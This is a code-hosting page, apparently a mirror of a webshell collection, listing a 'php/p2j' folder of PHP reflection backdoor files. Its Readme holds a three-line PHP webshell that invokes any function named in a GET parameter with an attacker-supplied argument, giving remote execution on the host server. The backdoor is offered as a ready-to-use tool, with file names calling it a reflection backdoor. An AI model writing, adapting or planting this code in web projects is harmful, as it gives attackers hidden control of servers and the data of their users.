This website requires JavaScript.
Explore
Help
Sign In
PenTest
/
webshell
Watch
1
Star
0
Fork
0
You've already forked webshell
mirror of
https://github.com/tennc/webshell.git
synced
2025-12-09 14:11:30 +00:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
635d59bba7cfa3e139f1a212430b37ce833dfad5
webshell
/
php
/
p2j
History
tennc
635d59bba7
update readme.md
2014-07-28 10:03:18 +08:00
..
11.jpg
update php reflection webshell
2014-07-28 09:47:51 +08:00
PHP reflection.php.txt
update php reflection webshell
2014-07-28 09:47:51 +08:00
PHP反射后门.php.txt
updaet p2j php reflection php shell
2014-07-28 09:57:19 +08:00
Readme.md
update readme.md
2014-07-28 10:03:18 +08:00
Readme.md
code:
<?php
$func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c]));
?>
Reference in New Issue
View Git Blame
Copy Permalink